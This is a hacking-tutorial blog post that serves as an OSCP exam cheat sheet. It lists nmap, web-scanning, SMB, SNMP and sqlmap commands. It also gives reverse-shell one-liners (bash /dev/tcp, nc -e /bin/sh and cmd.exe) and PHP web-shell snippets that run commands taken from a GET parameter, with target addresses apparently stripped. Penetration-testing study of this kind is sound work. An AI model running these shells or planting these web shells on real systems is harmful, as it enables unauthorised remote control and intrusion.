Useful Commands and Tools – OSCP

In previous article, we’ve shared a wide range of tools for sub-domain enumeration which helps pentesters and bug hunters collect and gather subdomains for the domain they are targeting.

Enumeration is the most important thing you can do, at that inevitable stage where you find yourself hitting a wall, 90% of the time it will be because you haven’t done enough enumeration.

There are a ton of certifications in this hacking and security domain but Offensive Security certifications are the ones that will really make you realize that you have actually earned it, rather than just crossed your fingers and did a MCQ exam.

Yes we’re talking about OSCP (Offensive Security Certified Professional). OSCP preparation, lab, and the exam is an awesome journey where you will experience lots of excitement, pain, suffering, frustration, confidence, and motivation where learning will be constant throughout the journey.

Below are the few commands which will be very helpful for OSCP preparation are as follows:

Nmap Commands

[#] Quick TCP Scan

Command: nmap -sC -sV -vv -oA quick

[#] Quick UDP Scan

Command: nmap -sU -sV -vv -oA quick_udp

[#] Full TCP Scan

Command: nmap -sC -sV -p- -vv -oA full

Web Scanning

[#] Nikto

Command: nikto -h

[#] Dirsearch

Command: python -u -e php,txt,html,log,conf,cfg,ini,pdf -x 301,403,503,302 –random-agent

[#] Directory Buster

Command: dirb /usr/share/wordlists/dirb/common.txt

[#] Whatweb

Command: whatweb -v -a 3

[#] Gobuster

Command: gobuster -e -u -w /usr/share/wordlists/dirb/common.txt

[#] Wfuzz

Command: wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt –hc 404

[#] WPScan

Command: wpscan -u

[#] Joomscan

Command: joomscan -u

Port Checking

[#] Netcat Banner Grabbing

Command: nc -v port

[#] Telnet Banner Grabbing

Command: telnet port


[#] SMB Vulnerability Scan

Command: nmap -p 445 -vv –script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse

[#] SMB Users & Shares Scan

Command: nmap -p 445 -vv –script=smb-enum-shares.nse,smb-enum-users.nse

[#] Enum4linux

Command: enum4linux -a

[#] Null connect

Command: rpcclient -U “”

[#] Connect to SMB share

Command: smbclient //MOUNT/share


[#] SNMP Enumeration

Command: snmp-check -c public

Python Servers

[#] Simple Web Server

Command: python -m SimpleHTTPServer 80

[#] FTP Server

Command: python -m pyftpdlib -p 21 -w

Reverse Shells

[#] Bash Shell

Command: bash -i >& /dev/tcp/ 0>&1

[#] Netcat linux

Command: nc -e /bin/sh 4443

[#] Netcat windows

Command: nc -e cmd.exe 4443


[#] PHP command Injection with system from GET Request

Command: <?php echo system($_GET[“cmd”]);?>

[#] PHP Command Injection with Shell Exec from GET Request

Command: <?php echo shell_exec($_GET[“cmd”]);?>

SQL Injection

[#] SQL Injection Exploitation with Sqlmap

Command: sqlmap -u –dbs

You may also like:

Sarcastic Writer

Step by step hacking tutorials about wireless cracking, kali linux, metasploit, ethical hacking, seo tips and tricks, malware analysis and scanning.

Related Posts